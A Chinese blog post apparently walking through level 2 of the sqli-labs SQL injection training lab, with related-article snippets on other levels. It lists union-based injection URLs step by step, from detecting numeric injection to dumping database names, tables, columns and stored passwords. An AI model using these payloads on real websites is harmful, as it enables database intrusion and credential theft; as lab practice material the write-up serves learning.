sqli-labs闯关1-2

最新推荐文章于 2023-10-26 09:16:09 发布
最新推荐文章于 2023-10-26 09:16:09 发布
阅读量164 收藏
点赞数
分类专栏: sql注入 文章标签: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_39086634/article/details/94387552
版权

sqli-labs闯关1-2

进入页面http://43.247.91.228:84/Less-2/

输入?id=1
http://43.247.91.228:84/Less-2/?id=1

输入?id=1’
http://43.247.91.228:84/Less-2/?id=1

输入?id=1 and 1=1
http://43.247.91.228:84/Less-2/?id=1 and 1=1
?id=1 and 1=1
http://43.247.91.228:84/Less-2/?id=1 and 1=2
根据结果可以判断该sql注入为数字型注入

接下来http://43.247.91.228:84/Less-2/?id=1 order by 4–+
得出有三列

判断回显位数http://43.247.91.228:84/Less-2/?id=99 union select 1,2,3–+

查看数据库名称http://43.247.91.228:84/Less-2/?id=99 union select 1,(select database()),3–+

查看数据库版本http://43.247.91.228:84/Less-2/?id=99 union select 1,(select version()),3–+

查看数据库名
http://43.247.91.228:84/Less-2/?id=99 union select 1,(select group_concat(schema_name) from information_schema.schemata ),3–+

查看当前数据库内的表名
http://43.247.91.228:84/Less-2/?id=99 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),3–+

查看users表中各字段
http://43.247.91.228:84/Less-2/?id=99 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ ),3–+

查看password表中各字段
http://43.247.91.228:84/Less-2/?id=99 union select 1,2,(select group_concat(password) from security.users )–+

Darklord.W
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs系列——第二关
1匹黑马
04-26 4057
文章目录判断注入类型开始注入 判断注入类型 1' and '1'='1 //错误 1 and 1=1 //正常 所以是数字型注入,所以不需要单引号来闭合前边的参数,但是要用-把参数注释掉,让Mysql执行我们后边的exp 开始注入 这里就不一一去爆了,跟第一关的流程是一样的,直接上exp干了: http://192.168.1.113:86/Less-2/?id=-1 union SELE...
sqli abs Less-1详解
weixin_43713000的博客
01-25 496
SQL 注入靶场 Sqli labs SQLI-LABS是一个开源靶机; 它将sql注入分为了 basic基本、advanced进阶、stacked堆叠注入、challenges挑战 四个等级; 含有60余个sql注入关卡,较全面的收纳了get及post包下的各类sql注入 方式环境 Less-1 Error Based- String GET - Error based - Single quotes - String (基于错误的GET单引号字符型注入) 第一关是基于字符串的单引号错误 首先在链.
sqlilab第一关
qq_45491497的博客
07-28 1997
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 3960
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
sqli-labs1-10关闯关心得与思路
m0_48294281的博客
03-08 6150
sqli-labs 1-11关闯关个人心得,欢迎交流指正。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当的mysql账号密码进行安装数据库的创建 介绍几个函数:   (1)version():查看数据库版本   (2)user():查看当前用户   (3)database():查看使用的数据库   (4) limit :limit子句来分批获取所有数据   (5)group_concat():一次性获取数据库信息。
sqli 第9关闯关(sqlmap)
laykr的博客
10-26 65
如果你不用dump的话,是不会显示username与password的,dump是存储的意思,现在打开你的sqlmap保存地址。我这里是因为本地已经有3.8的python了,所以为了指定用2.7版本python打开sqlmap所以前面有。找到security数据库下有users表,我们目标是为了窃取账户信息,那接下来肯定要开始探测列了。在我们用过一次sqlmap之后,应该--purge让sqlmap把缓存都清除掉。找到当前数据库是security,探测有什么表。4.探测users表对应的列。
Sqli-Labs闯关——更新
qq_18669681的博客
09-21 291
Sqli-Labs闯关Less-1 Less-1 正常访问: 一、判断 1 and 1=2 //访问正常,不是数值查询 1' //报错,可能为sql字符注入 1' --+//返回正常,所以为单引号字符注入 注: 1、我使用的是 --+来注释sql后面的语句,+的作用是,它在解析的时候会被解析为空格,用来隔开 --与后面语句。 2、#注释也是可行的,但在浏览器的url,他是被用来指导...
sqllab第一关新手向解析
Deeeelete的博客
09-25 982
1来到URL以PHP文件为结尾的界面,直接在文件后斜线构造?id=1’来判断,并通过报错的相关内容来分析,已知我们报错的内容为”1”LIMIT 0,1’,我们输入的内容是1’,所以后面的内容是’LIMIT 0,1’ 2这里我们判断它的字段数,使用order by n(数字) 来猜测,在猜测到字段4的时候报错,说明其会有三个字段,语句的%23是注释,用来消除后面不需要的语句,常有的注释有# %2...
sqli-liabs通关之旅
weixin_42123571的博客
04-29 566
sqli-liabs通关之旅 第一关 加‘报错 加‘--+正常 ?id=-1' order by 3 --+ 页面正常 ?id=-1' order by 4 --+ 页面错误 判断字段长度为3 确定回显点: id=-1' union select 1,2,3--+ 猜数据库: -1' union select 1,database(),3--+ 猜表名: -1' union sele...
sqli-liabs学习SQL注入之旅(第二十一关~第三十关)
guanjian_ci的博客
04-23 3075
二十一关 打开这一关,开屏暴击。报错的大致意思是时区没有设置好,我们进入报错的文件,在php代码加入国时区的代码即可: date_default_timezone_set("PRC"); 其实不改这个也不影响我们做题目,只是有错不改看着难受而已,页面正常后,开始正题: 第一步:在账号密码框一顿输出后,发现注入点不在外面,只能登录进入里面看看,看到了页面显示了我们的UA、cookie等信息。有点类似第二十关,属于cookie注入!唯一不同的是这一关考察了一个加解密运用,cook.
SQLLIBS靶场进阶(2)
ppbgi的博客
04-14 662
1—22关链接 二十三 将#、–+进行了处理 其他同上! 二十四 先进行账号的注册: 登录: 修改密码:初始密码123456 ,修改为234567 用修改的密码登录admin2: 二十五 或者 在尝试的时候,发现&&会报错,但是理论上来讲应该可以,所以用了|| 其他同上! ...
sqli-liabs学习SQL注入之旅(第三十一关~第四十关)
guanjian_ci的博客
05-05 630
三十一关 (考察内容:双引号+括号、参数污染) 这一关和二十九、三十关几乎相同,这关参数接受方式为 id = ("&id"),直接爆出数据! ?id=1&id=0") union select 1,group_concat(username,password),3 from users--+ 三十二关 (基于宽字符逃逸注入;简称:宽字节注入) 简单测试或分析源码,代码利用正则匹配将 [ /,'," ]这些三个符号都过滤掉了。 拓展学习:在mysql,用于转
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值